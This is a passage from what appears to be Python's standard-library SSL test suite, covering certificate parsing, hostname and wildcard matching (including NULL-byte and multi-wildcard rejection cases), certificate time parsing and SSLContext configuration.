san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
